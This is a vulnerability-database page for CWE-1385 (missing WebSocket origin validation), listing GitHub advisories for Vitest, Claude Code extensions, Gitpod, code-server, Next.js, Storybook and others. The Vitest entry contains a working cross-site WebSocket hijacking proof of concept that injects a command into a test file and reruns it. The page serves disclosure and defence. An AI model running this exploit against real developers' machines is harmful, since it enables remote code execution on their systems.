CWE-1385
AllowedMissing Origin Validation in WebSockets
Abstraction: Variant · Status: Incomplete
The product uses a WebSocket, but it does not properly verify that the source of data or communication is valid.
58 vulnerabilities reference this CWE, most recent first.
GHSA-8JV6-9X2J-W49P
Vulnerability from github – Published: 2024-08-15 21:31 – Updated: 2024-08-16 00:32Vulnerability in Xiexe XSOverlay before build 647 allows non-local websites to send the malicious commands to the WebSocket API, resulting in the arbitrary code execution.
{
"affected": [],
"aliases": [
"CVE-2024-23168"
],
"database_specific": {
"cwe_ids": [
"CWE-1385"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2024-08-15T19:15:18Z",
"severity": "CRITICAL"
},
"details": "Vulnerability in Xiexe XSOverlay before build 647 allows non-local websites to send the malicious commands to the WebSocket API, resulting in the arbitrary code execution.",
"id": "GHSA-8jv6-9x2j-w49p",
"modified": "2024-08-16T00:32:04Z",
"published": "2024-08-15T21:31:19Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2024-23168"
},
{
"type": "WEB",
"url": "https://github.com/Xiexe/XSOverlay-Issue-Tracker"
},
{
"type": "WEB",
"url": "https://store.steampowered.com/news/app/1173510?emclan=103582791465938574\u0026emgid=7792991106417394332"
},
{
"type": "WEB",
"url": "https://vuln.ryotak.net/advisories/70"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"type": "CVSS_V3"
}
]
}
GHSA-9CRC-Q9X8-HGQQ
Vulnerability from github – Published: 2025-02-04 17:00 – Updated: 2025-02-04 22:04Summary
Arbitrary remote Code Execution when accessing a malicious website while Vitest API server is listening by Cross-site WebSocket hijacking (CSWSH) attacks.
Details
When api option is enabled (Vitest UI enables it), Vitest starts a WebSocket server. This WebSocket server did not check Origin header and did not have any authorization mechanism and was vulnerable to CSWSH attacks.
https://github.com/vitest-dev/vitest/blob/9a581e1c43e5c02b11e2a8026a55ce6a8cb35114/packages/vitest/src/api/setup.ts#L32-L46
This WebSocket server has saveTestFile API that can edit a test file and rerun API that can rerun the tests. An attacker can execute arbitrary code by injecting a code in a test file by the saveTestFile API and then running that file by calling the rerun API.
https://github.com/vitest-dev/vitest/blob/9a581e1c43e5c02b11e2a8026a55ce6a8cb35114/packages/vitest/src/api/setup.ts#L66-L76
PoC
- Open Vitest UI.
- Access a malicious web site with the script below.
- If you have
calcexecutable inPATHenv var (you'll likely have it if you are running on Windows), that application will be executed.
// code from https://github.com/WebReflection/flatted
const Flatted=function(n){"use strict";function t(n){return t="function"==typeof Symbol&&"symbol"==typeof Symbol.iterator?function(n){return typeof n}:function(n){return n&&"function"==typeof Symbol&&n.constructor===Symbol&&n!==Symbol.prototype?"symbol":typeof n},t(n)}var r=JSON.parse,e=JSON.stringify,o=Object.keys,u=String,f="string",i={},c="object",a=function(n,t){return t},l=function(n){return n instanceof u?u(n):n},s=function(n,r){return t(r)===f?new u(r):r},y=function n(r,e,f,a){for(var l=[],s=o(f),y=s.length,p=0;p<y;p++){var v=s[p],S=f[v];if(S instanceof u){var b=r[S];t(b)!==c||e.has(b)?f[v]=a.call(f,v,b):(e.add(b),f[v]=i,l.push({k:v,a:[r,e,b,a]}))}else f[v]!==i&&(f[v]=a.call(f,v,S))}for(var m=l.length,g=0;g<m;g++){var h=l[g],O=h.k,d=h.a;f[O]=a.call(f,O,n.apply(null,d))}return f},p=function(n,t,r){var e=u(t.push(r)-1);return n.set(r,e),e},v=function(n,e){var o=r(n,s).map(l),u=o[0],f=e||a,i=t(u)===c&&u?y(o,new Set,u,f):u;return f.call({"":i},"",i)},S=function(n,r,o){for(var u=r&&t(r)===c?function(n,t){return""===n||-1<r.indexOf(n)?t:void 0}:r||a,i=new Map,l=[],s=[],y=+p(i,l,u.call({"":n},"",n)),v=!y;y<l.length;)v=!0,s[y]=e(l[y++],S,o);return"["+s.join(",")+"]";function S(n,r){if(v)return v=!v,r;var e=u.call(this,n,r);switch(t(e)){case c:if(null===e)return e;case f:return i.get(e)||p(i,l,e)}return e}};return n.fromJSON=function(n){return v(e(n))},n.parse=v,n.stringify=S,n.toJSON=function(n){return r(S(n))},n}({});
// actual code to run
const ws = new WebSocket('ws://localhost:51204/__vitest_api__')
ws.addEventListener('message', e => {
console.log(e.data)
})
ws.addEventListener('open', () => {
ws.send(Flatted.stringify({ t: 'q', i: crypto.randomUUID(), m: "getFiles", a: [] }))
const testFilePath = "/path/to/test-file/basic.test.ts" // use a test file returned from the response of "getFiles"
// edit file content to inject command execution
ws.send(Flatted.stringify({
t: 'q',
i: crypto.randomUUID(),
m: "saveTestFile",
a: [testFilePath, "import child_process from 'child_process';child_process.execSync('calc')"]
}))
// rerun the tests to run the injected command execution code
ws.send(Flatted.stringify({
t: 'q',
i: crypto.randomUUID(),
m: "rerun",
a: [testFilePath]
}))
})
Impact
This vulnerability can result in remote code execution for users that are using Vitest serve API.
{
"affected": [
{
"package": {
"ecosystem": "npm",
"name": "vitest"
},
"ranges": [
{
"events": [
{
"introduced": "1.0.0"
},
{
"fixed": "1.6.1"
}
],
"type": "ECOSYSTEM"
}
]
},
{
"package": {
"ecosystem": "npm",
"name": "vitest"
},
"ranges": [
{
"events": [
{
"introduced": "2.0.0"
},
{
"fixed": "2.1.9"
}
],
"type": "ECOSYSTEM"
}
]
},
{
"package": {
"ecosystem": "npm",
"name": "vitest"
},
"ranges": [
{
"events": [
{
"introduced": "3.0.0"
},
{
"fixed": "3.0.5"
}
],
"type": "ECOSYSTEM"
}
]
},
{
"package": {
"ecosystem": "npm",
"name": "vitest"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"last_affected": "0.0.125"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2025-24964"
],
"database_specific": {
"cwe_ids": [
"CWE-1385"
],
"github_reviewed": true,
"github_reviewed_at": "2025-02-04T17:00:57Z",
"nvd_published_at": "2025-02-04T20:15:50Z",
"severity": "CRITICAL"
},
"details": "### Summary\nArbitrary remote Code Execution when accessing a malicious website while Vitest API server is listening by Cross-site WebSocket hijacking (CSWSH) attacks.\n\n### Details\nWhen [`api` option](https://vitest.dev/config/#api) is enabled (Vitest UI enables it), Vitest starts a WebSocket server. This WebSocket server did not check Origin header and did not have any authorization mechanism and was vulnerable to CSWSH attacks.\nhttps://github.com/vitest-dev/vitest/blob/9a581e1c43e5c02b11e2a8026a55ce6a8cb35114/packages/vitest/src/api/setup.ts#L32-L46\n\nThis WebSocket server has `saveTestFile` API that can edit a test file and `rerun` API that can rerun the tests. An attacker can execute arbitrary code by injecting a code in a test file by the `saveTestFile` API and then running that file by calling the `rerun` API.\nhttps://github.com/vitest-dev/vitest/blob/9a581e1c43e5c02b11e2a8026a55ce6a8cb35114/packages/vitest/src/api/setup.ts#L66-L76\n\n### PoC\n1. Open Vitest UI.\n2. Access a malicious web site with the script below.\n3. If you have `calc` executable in `PATH` env var (you\u0027ll likely have it if you are running on Windows), that application will be executed.\n\n```js\n// code from https://github.com/WebReflection/flatted\nconst Flatted=function(n){\"use strict\";function t(n){return t=\"function\"==typeof Symbol\u0026\u0026\"symbol\"==typeof Symbol.iterator?function(n){return typeof n}:function(n){return n\u0026\u0026\"function\"==typeof Symbol\u0026\u0026n.constructor===Symbol\u0026\u0026n!==Symbol.prototype?\"symbol\":typeof n},t(n)}var r=JSON.parse,e=JSON.stringify,o=Object.keys,u=String,f=\"string\",i={},c=\"object\",a=function(n,t){return t},l=function(n){return n instanceof u?u(n):n},s=function(n,r){return t(r)===f?new u(r):r},y=function n(r,e,f,a){for(var l=[],s=o(f),y=s.length,p=0;p\u003cy;p++){var v=s[p],S=f[v];if(S instanceof u){var b=r[S];t(b)!==c||e.has(b)?f[v]=a.call(f,v,b):(e.add(b),f[v]=i,l.push({k:v,a:[r,e,b,a]}))}else f[v]!==i\u0026\u0026(f[v]=a.call(f,v,S))}for(var m=l.length,g=0;g\u003cm;g++){var h=l[g],O=h.k,d=h.a;f[O]=a.call(f,O,n.apply(null,d))}return f},p=function(n,t,r){var e=u(t.push(r)-1);return n.set(r,e),e},v=function(n,e){var o=r(n,s).map(l),u=o[0],f=e||a,i=t(u)===c\u0026\u0026u?y(o,new Set,u,f):u;return f.call({\"\":i},\"\",i)},S=function(n,r,o){for(var u=r\u0026\u0026t(r)===c?function(n,t){return\"\"===n||-1\u003cr.indexOf(n)?t:void 0}:r||a,i=new Map,l=[],s=[],y=+p(i,l,u.call({\"\":n},\"\",n)),v=!y;y\u003cl.length;)v=!0,s[y]=e(l[y++],S,o);return\"[\"+s.join(\",\")+\"]\";function S(n,r){if(v)return v=!v,r;var e=u.call(this,n,r);switch(t(e)){case c:if(null===e)return e;case f:return i.get(e)||p(i,l,e)}return e}};return n.fromJSON=function(n){return v(e(n))},n.parse=v,n.stringify=S,n.toJSON=function(n){return r(S(n))},n}({});\n\n// actual code to run\nconst ws = new WebSocket(\u0027ws://localhost:51204/__vitest_api__\u0027)\nws.addEventListener(\u0027message\u0027, e =\u003e {\n console.log(e.data)\n})\nws.addEventListener(\u0027open\u0027, () =\u003e {\n ws.send(Flatted.stringify({ t: \u0027q\u0027, i: crypto.randomUUID(), m: \"getFiles\", a: [] }))\n\n const testFilePath = \"/path/to/test-file/basic.test.ts\" // use a test file returned from the response of \"getFiles\"\n\n // edit file content to inject command execution\n ws.send(Flatted.stringify({\n t: \u0027q\u0027,\n i: crypto.randomUUID(),\n m: \"saveTestFile\",\n a: [testFilePath, \"import child_process from \u0027child_process\u0027;child_process.execSync(\u0027calc\u0027)\"]\n }))\n // rerun the tests to run the injected command execution code\n ws.send(Flatted.stringify({\n t: \u0027q\u0027,\n i: crypto.randomUUID(),\n m: \"rerun\",\n a: [testFilePath]\n }))\n})\n```\n\n### Impact\nThis vulnerability can result in remote code execution for users that are using Vitest serve API.",
"id": "GHSA-9crc-q9x8-hgqq",
"modified": "2025-02-04T22:04:09Z",
"published": "2025-02-04T17:00:57Z",
"references": [
{
"type": "WEB",
"url": "https://github.com/vitest-dev/vitest/security/advisories/GHSA-9crc-q9x8-hgqq"
},
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2025-24964"
},
{
"type": "WEB",
"url": "https://github.com/vitest-dev/vitest/commit/191ef9e34c867d0efd04f49b3d38193a68e825dc"
},
{
"type": "WEB",
"url": "https://github.com/vitest-dev/vitest/commit/7ce9fbb4972d45c6fd34c843645ef6f549bbb241"
},
{
"type": "WEB",
"url": "https://github.com/vitest-dev/vitest/commit/e0fe1d81e2d4bcddb1c6ca3c5c3970d8ba697383"
},
{
"type": "PACKAGE",
"url": "https://github.com/vitest-dev/vitest"
},
{
"type": "WEB",
"url": "https://github.com/vitest-dev/vitest/blob/9a581e1c43e5c02b11e2a8026a55ce6a8cb35114/packages/vitest/src/api/setup.ts#L32-L46"
},
{
"type": "WEB",
"url": "https://github.com/vitest-dev/vitest/blob/9a581e1c43e5c02b11e2a8026a55ce6a8cb35114/packages/vitest/src/api/setup.ts#L66-L76"
},
{
"type": "WEB",
"url": "https://vitest.dev/config/#api"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H",
"type": "CVSS_V3"
}
],
"summary": "Vitest allows Remote Code Execution when accessing a malicious website while Vitest API server is listening"
}
GHSA-9F65-56V6-GXW7
Vulnerability from github – Published: 2025-06-23 21:22 – Updated: 2025-06-27 23:07Claude Code extensions in VSCode and forks (e.g., Cursor, Windsurf, and VSCodium) and JetBrains IDEs (e.g., IntelliJ, Pycharm, and Android Studio) are vulnerable to unauthorized websocket connections from an attacker when visiting attacker-controlled webpages. Claude Code for VSCode IDE extensions versions 0.2.116 through 1.0.23 are vulnerable. For Jetbrains IDE plugins, Claude Code [beta] versions 0.1.1 through 0.1.8 are vulnerable.
In VSCode (and forks), exploitation would allow an attacker to read arbitrary files, see the list of files open in the IDE, get selection and diagnostics events from the IDE, or execute code in limited situations where a user has an open Jupyter Notebook and accepts a malicious prompt. In JetBrains IDEs, an attacker could get selection events, a list of open files, and a list of syntax errors.
Remediation
We released a patch for this issue on June 13th, 2025. Although Claude Code auto-updates when you launch it and auto-updates the extensions, you should take the following steps (the exact steps depend on your IDE).
VSCode, Cursor, Windsurf, VSCodium, and other VSCode forks Extension Name: Claude Code for VSCode
Instructions:
- Open the list of Extensions (View->Extensions)
- Look for Claude Code for VSCode among installed extensions
- If you have a version < 1.0.24, click “Update” (or “Uninstall”)
- Restart the IDE
All JetBrains IDEs including IntelliJ, PyCharm, and Android Studio Plugin name: Claude Code [Beta]
Instructions:
- Open the Plugins list
- Look for Claude Code [Beta] among installed extensions
- Update (or Uninstall) the plugin if the version is < 0.1.9
- Restart the IDE
{
"affected": [
{
"package": {
"ecosystem": "npm",
"name": "@anthropic-ai/claude-code"
},
"ranges": [
{
"events": [
{
"introduced": "0.2.116"
},
{
"fixed": "1.0.24"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2025-52882"
],
"database_specific": {
"cwe_ids": [
"CWE-1385",
"CWE-285"
],
"github_reviewed": true,
"github_reviewed_at": "2025-06-23T21:22:22Z",
"nvd_published_at": "2025-06-24T20:15:26Z",
"severity": "HIGH"
},
"details": "Claude Code extensions in VSCode and forks (e.g., Cursor, Windsurf, and VSCodium) and JetBrains IDEs (e.g., IntelliJ, Pycharm, and Android Studio) are vulnerable to unauthorized websocket connections from an attacker when visiting attacker-controlled webpages. Claude Code for VSCode IDE extensions versions 0.2.116 through 1.0.23 are vulnerable. For Jetbrains IDE plugins, Claude Code [beta] versions 0.1.1 through 0.1.8 are vulnerable. \n\nIn VSCode (and forks), exploitation would allow an attacker to read arbitrary files, see the list of files open in the IDE, get selection and diagnostics events from the IDE, or execute code in limited situations where a user has an open Jupyter Notebook and accepts a malicious prompt. In JetBrains IDEs, an attacker could get selection events, a list of open files, and a list of syntax errors.\n\n**Remediation**\n\nWe released a patch for this issue on June 13th, 2025. Although Claude Code auto-updates when you launch it and auto-updates the extensions, you should take the following steps (the exact steps depend on your IDE).\n\n**VSCode, Cursor, Windsurf, VSCodium, and other VSCode forks**\nExtension Name: Claude Code for VSCode\n\nInstructions:\n\n1. Open the list of Extensions (View-\u003eExtensions)\n2. Look for Claude Code for VSCode among installed extensions\n3. If you have a version \u003c 1.0.24, click \u201cUpdate\u201d (or \u201cUninstall\u201d)\n4. Restart the IDE \n\n**All JetBrains IDEs including IntelliJ, PyCharm, and Android Studio**\nPlugin name: Claude Code [Beta]\n\nInstructions:\n\n1. Open the Plugins list\n2. Look for Claude Code [Beta] among installed extensions\n3. Update (or Uninstall) the plugin if the version is \u003c 0.1.9\n4. Restart the IDE",
"id": "GHSA-9f65-56v6-gxw7",
"modified": "2025-06-27T23:07:59Z",
"published": "2025-06-23T21:22:22Z",
"references": [
{
"type": "WEB",
"url": "https://github.com/anthropics/claude-code/security/advisories/GHSA-9f65-56v6-gxw7"
},
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2025-52882"
},
{
"type": "PACKAGE",
"url": "https://github.com/anthropics/claude-code"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:P/VC:H/VI:H/VA:N/SC:H/SI:H/SA:N",
"type": "CVSS_V4"
}
],
"summary": "Claude Code Improper Authorization via websocket connections from arbitrary origins"
}
GHSA-C398-4R23-X3C7
Vulnerability from github – Published: 2025-05-16 09:30 – Updated: 2025-05-16 09:30Cross-Site WebSocket Hijacking vulnerability in Hitachi Ops Center Analyzer (RAID Agent component).This issue affects Hitachi Ops Center Analyzer: from 10.8.0-00 before 11.0.4-00; Hitachi Ops Center Analyzer: from 10.9.0-00 before 11.0.4-00.
{
"affected": [],
"aliases": [
"CVE-2024-8201"
],
"database_specific": {
"cwe_ids": [
"CWE-1385"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2025-05-16T07:15:46Z",
"severity": "MODERATE"
},
"details": "Cross-Site WebSocket Hijacking\u00a0vulnerability in Hitachi Ops Center Analyzer (RAID Agent component).This issue affects Hitachi Ops Center Analyzer: from 10.8.0-00 before 11.0.4-00; Hitachi Ops Center Analyzer: from 10.9.0-00 before 11.0.4-00.",
"id": "GHSA-c398-4r23-x3c7",
"modified": "2025-05-16T09:30:36Z",
"published": "2025-05-16T09:30:36Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2024-8201"
},
{
"type": "WEB",
"url": "https://www.hitachi.com/products/it/software/security/info/vuls/hitachi-sec-2025-116/index.html"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:N",
"type": "CVSS_V3"
}
]
}
GHSA-F53G-FRR2-JHPF
Vulnerability from github – Published: 2023-07-06 19:24 – Updated: 2024-04-04 05:33An issue was discovered in Gitpod versions prior to release-2022.11.2.16. There is a Cross-Site WebSocket Hijacking (CSWSH) vulnerability that allows attackers to make WebSocket connections to the Gitpod JSONRPC server using a victim’s credentials, because the Origin header is not restricted. This can lead to the extraction of data from workspaces, to a full takeover of the workspace.
{
"affected": [],
"aliases": [
"CVE-2023-0957"
],
"database_specific": {
"cwe_ids": [
"CWE-1385",
"CWE-346"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2023-03-03T08:15:00Z",
"severity": "CRITICAL"
},
"details": "An issue was discovered in Gitpod versions prior to release-2022.11.2.16. There is a Cross-Site WebSocket Hijacking (CSWSH) vulnerability that allows attackers to make WebSocket connections to the Gitpod JSONRPC server using a victim\u2019s credentials, because the Origin header is not restricted. This can lead to the extraction of data from workspaces, to a full takeover of the workspace.",
"id": "GHSA-f53g-frr2-jhpf",
"modified": "2024-04-04T05:33:50Z",
"published": "2023-07-06T19:24:11Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2023-0957"
},
{
"type": "WEB",
"url": "https://github.com/gitpod-io/gitpod/pull/16378"
},
{
"type": "WEB",
"url": "https://github.com/gitpod-io/gitpod/pull/16405"
},
{
"type": "WEB",
"url": "https://github.com/gitpod-io/gitpod/commit/12956988eec0031f42ffdfa3bdc3359f65628f9f"
},
{
"type": "WEB",
"url": "https://github.com/gitpod-io/gitpod/commit/673ab6856fa04c13b7b1f2a968e4d090f1d94e4f"
},
{
"type": "WEB",
"url": "https://app.safebase.io/portal/71ccd717-aa2d-4a1e-942e-c768d37e9e0c/preview?product=default\u0026orgId=71ccd717-aa2d-4a1e-942e-c768d37e9e0c\u0026tcuUid=1d505bda-9a38-4ca5-8724-052e6337f34d"
},
{
"type": "WEB",
"url": "https://github.com/gitpod-io/gitpod/releases/tag/release-2022.11.2"
},
{
"type": "WEB",
"url": "https://snyk.io/blog/gitpod-remote-code-execution-vulnerability-websockets"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H",
"type": "CVSS_V3"
}
]
}
GHSA-FRJG-G767-7363
Vulnerability from github – Published: 2023-03-23 06:30 – Updated: 2023-03-27 22:32Versions of the package code-server before 4.10.1 are vulnerable to Missing Origin Validation in WebSockets handshakes. Exploiting this vulnerability can allow an adversary in specific scenarios to access data from and connect to the code-server instance.
{
"affected": [
{
"package": {
"ecosystem": "npm",
"name": "code-server"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "4.10.1"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2023-26114"
],
"database_specific": {
"cwe_ids": [
"CWE-1385",
"CWE-346"
],
"github_reviewed": true,
"github_reviewed_at": "2023-03-23T19:58:10Z",
"nvd_published_at": "2023-03-23T05:15:00Z",
"severity": "CRITICAL"
},
"details": "Versions of the package code-server before 4.10.1 are vulnerable to Missing Origin Validation in WebSockets handshakes. Exploiting this vulnerability can allow an adversary in specific scenarios to access data from and connect to the code-server instance.",
"id": "GHSA-frjg-g767-7363",
"modified": "2023-03-27T22:32:09Z",
"published": "2023-03-23T06:30:15Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2023-26114"
},
{
"type": "WEB",
"url": "https://github.com/coder/code-server/commit/d477972c68fc8c8e8d610aa7287db87ba90e55c7"
},
{
"type": "PACKAGE",
"url": "https://github.com/coder/code-server"
},
{
"type": "WEB",
"url": "https://github.com/coder/code-server/releases/tag/v4.10.1"
},
{
"type": "WEB",
"url": "https://security.snyk.io/vuln/SNYK-JS-CODESERVER-3368148"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:N",
"type": "CVSS_V3"
}
],
"summary": "code-server vulnerable to Missing Origin Validation in WebSockets"
}
GHSA-JCC7-9WPM-MJ36
Vulnerability from github – Published: 2026-03-17 15:29 – Updated: 2026-03-25 18:51Summary
In next dev, cross-site protections for internal development endpoints could treat Origin: null as a bypass case even when allowedDevOrigins is configured. This could allow privacy-sensitive or opaque browser contexts, such as sandboxed documents, to access privileged internal dev-server functionality unexpectedly.
Impact
If a developer visits attacker-controlled content while running an affected next dev server with allowedDevOrigins configured, attacker-controlled browser code may be able to connect to internal development endpoints and interact with sensitive dev-server functionality that should have remained blocked.
This issue affects development mode only. It does not affect next start, and it does not expose internal debugging functionality to the network by default.
Patches
Fixed by validating Origin: null through the same cross-site origin-allowance checks used for other origins on internal development endpoints.
Workarounds
If upgrade is not immediately possible:
- Do not expose next dev to untrusted networks.
- If you use allowedDevOrigins, reject requests and websocket upgrades with Origin: null for internal dev endpoints at your proxy.
{
"affected": [
{
"package": {
"ecosystem": "npm",
"name": "next"
},
"ranges": [
{
"events": [
{
"introduced": "16.0.1"
},
{
"fixed": "16.1.7"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2026-27977"
],
"database_specific": {
"cwe_ids": [
"CWE-1385"
],
"github_reviewed": true,
"github_reviewed_at": "2026-03-17T15:29:48Z",
"nvd_published_at": "2026-03-18T00:16:19Z",
"severity": "LOW"
},
"details": "## Summary\nIn `next dev`, cross-site protections for internal development endpoints could treat `Origin: null` as a bypass case even when [`allowedDevOrigins`](https://nextjs.org/docs/app/api-reference/config/next-config-js/allowedDevOrigins) is configured. This could allow privacy-sensitive or opaque browser contexts, such as sandboxed documents, to access privileged internal dev-server functionality unexpectedly.\n\n## Impact\nIf a developer visits attacker-controlled content while running an affected `next dev` server with [`allowedDevOrigins`](https://nextjs.org/docs/app/api-reference/config/next-config-js/allowedDevOrigins) configured, attacker-controlled browser code may be able to connect to internal development endpoints and interact with sensitive dev-server functionality that should have remained blocked.\n\nThis issue affects development mode only. It does not affect `next start`, and it does not expose internal debugging functionality to the network by default.\n\n## Patches\nFixed by validating `Origin: null` through the same cross-site origin-allowance checks used for other origins on internal development endpoints.\n\n## Workarounds\nIf upgrade is not immediately possible:\n- Do not expose `next dev` to untrusted networks.\n- If you use [`allowedDevOrigins`](https://nextjs.org/docs/app/api-reference/config/next-config-js/allowedDevOrigins), reject requests and websocket upgrades with `Origin: null` for internal dev endpoints at your proxy.",
"id": "GHSA-jcc7-9wpm-mj36",
"modified": "2026-03-25T18:51:19Z",
"published": "2026-03-17T15:29:48Z",
"references": [
{
"type": "WEB",
"url": "https://github.com/vercel/next.js/security/advisories/GHSA-jcc7-9wpm-mj36"
},
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-27977"
},
{
"type": "WEB",
"url": "https://github.com/vercel/next.js/commit/862f9b9bb41d235e0d8cf44aa811e7fd118cee2a"
},
{
"type": "PACKAGE",
"url": "https://github.com/vercel/next.js"
},
{
"type": "WEB",
"url": "https://github.com/vercel/next.js/releases/tag/v16.1.7"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:P/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N",
"type": "CVSS_V4"
}
],
"summary": "Next.js: null origin can bypass dev HMR websocket CSRF checks"
}
GHSA-M9RR-H88H-H8W6
Vulnerability from github – Published: 2023-09-14 12:30 – Updated: 2024-04-04 07:40Movim prior to version 0.22 is affected by a Cross-Site WebSocket Hijacking vulnerability. This was the result of a missing header validation.
{
"affected": [],
"aliases": [
"CVE-2023-2848"
],
"database_specific": {
"cwe_ids": [
"CWE-1385",
"CWE-346"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2023-09-14T12:15:07Z",
"severity": "HIGH"
},
"details": "Movim prior to version 0.22 is affected by a Cross-Site WebSocket Hijacking vulnerability. This was the result of a missing header validation.",
"id": "GHSA-m9rr-h88h-h8w6",
"modified": "2024-04-04T07:40:15Z",
"published": "2023-09-14T12:30:20Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2023-2848"
},
{
"type": "WEB",
"url": "https://github.com/movim/movim/commit/49e2012aecdf918bb1d16f278fa9ff42fad29a9d"
},
{
"type": "WEB",
"url": "https://github.com/movim/movim/commit/96372082acd3e5d778a2522a60a1805bf2af31f6"
},
{
"type": "WEB",
"url": "https://mov.im/node/pubsub.movim.eu/Movim/a2d05925-0427-4f3f-b777-d20571ddddff"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:C/C:H/I:H/A:N",
"type": "CVSS_V3"
}
]
}
GHSA-MJF5-7G4M-GX5W
Vulnerability from github – Published: 2026-02-26 15:16 – Updated: 2026-02-26 15:16Summary
The WebSocket functionality in Storybook's dev server, used to create and update stories, is vulnerable to WebSocket hijacking. This vulnerability only affects the Storybook dev server; production builds are not impacted.
Details
Exploitation requires a developer to visit a malicious website while their local Storybook dev server is running. Because the WebSocket connection does not validate the origin of incoming connections, a malicious site can silently send WebSocket messages to the local instance without any further user interaction.
If a Storybook dev server is intentionally exposed publicly (e.g. for design reviews or stakeholder demos) the risk is higher, as no malicious site visit is required. Any unauthenticated attacker can send WebSocket messages to it directly.
The vulnerability affects the WebSocket message handlers for creating and saving stories, which can be exploited via unauthorized WebSocket connections to achieve persistent XSS or Remote Code Execution (RCE).
Note: recent versions of Chrome have some protections against this, but Firefox does not.
Impact
This vulnerability can lead to supply chain compromise. Key risks include:
- Remote Code Execution: The vulnerability can allow attackers to execute malicious code, with the extent of impact depending on the configuration. Server-side RCE is possible in non-default configurations, such as when stories are executed via portable stories in JSDOM, potentially allowing attackers to exfiltrate credentials and environment variables, access source code and the filesystem, establish backdoors, or pivot to internal network resources.
- Persistent XSS: Malicious payloads are written directly into story source files. If the malicious payload is committed to version control, it becomes part of the codebase and can propagate to deployed Storybook documentation sites, affecting developers and stakeholders who view them.
- Supply Chain Propagation: If the modified source files are committed, injected code can spread to other team members via git, execute in CI/CD pipelines, and affect shared component libraries used across multiple projects.
Affected versions
8.1 and above. While the exploitable functionality was introduced in 8.1, the patch has been applied to 7.x as a precautionary measure given the underlying WebSocket behaviour.
Recommended actions
Update to one of the patched versions: 7.6.23, 8.6.17, 9.1.19, 10.2.10.
{
"affected": [
{
"package": {
"ecosystem": "npm",
"name": "storybook"
},
"ranges": [
{
"events": [
{
"introduced": "8.1.0"
},
{
"fixed": "8.6.17"
}
],
"type": "ECOSYSTEM"
}
]
},
{
"package": {
"ecosystem": "npm",
"name": "storybook"
},
"ranges": [
{
"events": [
{
"introduced": "8.7.0-alpha.0"
},
{
"fixed": "9.1.19"
}
],
"type": "ECOSYSTEM"
}
]
},
{
"package": {
"ecosystem": "npm",
"name": "storybook"
},
"ranges": [
{
"events": [
{
"introduced": "10.0.0-beta.0"
},
{
"fixed": "10.2.10"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2026-27148"
],
"database_specific": {
"cwe_ids": [
"CWE-1385",
"CWE-74",
"CWE-79"
],
"github_reviewed": true,
"github_reviewed_at": "2026-02-26T15:16:10Z",
"nvd_published_at": "2026-02-25T22:16:25Z",
"severity": "HIGH"
},
"details": "### Summary\n\nThe WebSocket functionality in Storybook\u0027s dev server, used to create and update stories, is vulnerable to WebSocket hijacking. This vulnerability **only affects the Storybook dev server; production builds are not impacted**.\n\n### Details\n\nExploitation requires a developer to visit a malicious website while their local Storybook dev server is running. Because the WebSocket connection does not validate the origin of incoming connections, a malicious site can silently send WebSocket messages to the local instance without any further user interaction.\n\nIf a Storybook dev server is intentionally exposed publicly (e.g. for design reviews or stakeholder demos) the risk is higher, as no malicious site visit is required. Any unauthenticated attacker can send WebSocket messages to it directly.\n\nThe vulnerability affects the WebSocket message handlers for creating and saving stories, which can be exploited via unauthorized WebSocket connections to achieve persistent XSS or Remote Code Execution (RCE).\n\n_Note: recent versions of Chrome have some protections against this, but Firefox does not._\n\n### Impact\nThis vulnerability can lead to supply chain compromise. Key risks include:\n\n- **Remote Code Execution**: The vulnerability can allow attackers to execute malicious code, with the extent of impact depending on the configuration. Server-side RCE is possible in non-default configurations, such as when stories are executed via portable stories in JSDOM, potentially allowing attackers to exfiltrate credentials and environment variables, access source code and the filesystem, establish backdoors, or pivot to internal network resources.\n- **Persistent XSS**: Malicious payloads are written directly into story source files. If the malicious payload is committed to version control, it becomes part of the codebase and can propagate to deployed Storybook documentation sites, affecting developers and stakeholders who view them.\n- **Supply Chain Propagation**: If the modified source files are committed, injected code can spread to other team members via git, execute in CI/CD pipelines, and affect shared component libraries used across multiple projects.\n\n### Affected versions\n\n8.1 and above. While 